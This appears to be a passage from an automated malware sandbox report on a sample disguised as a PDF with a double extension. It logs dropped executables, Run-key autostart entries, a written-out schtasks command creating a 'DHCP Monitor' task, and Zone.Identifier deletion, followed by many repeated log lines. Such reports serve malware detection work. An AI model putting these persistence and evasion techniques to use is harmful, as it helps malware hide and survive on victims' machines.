      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival

      barindex
      Creates multiple autostart registry keys
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Creates autostart registry keys with suspicious values (likely registry only malware)
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbsJump to behavior
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ChromeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdateJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete
      Uses an obfuscated file name to hide its real file extension (double extension)
      Source: Possible double extension: pdf.scrStatic PE information: 004349256789197.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C325A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
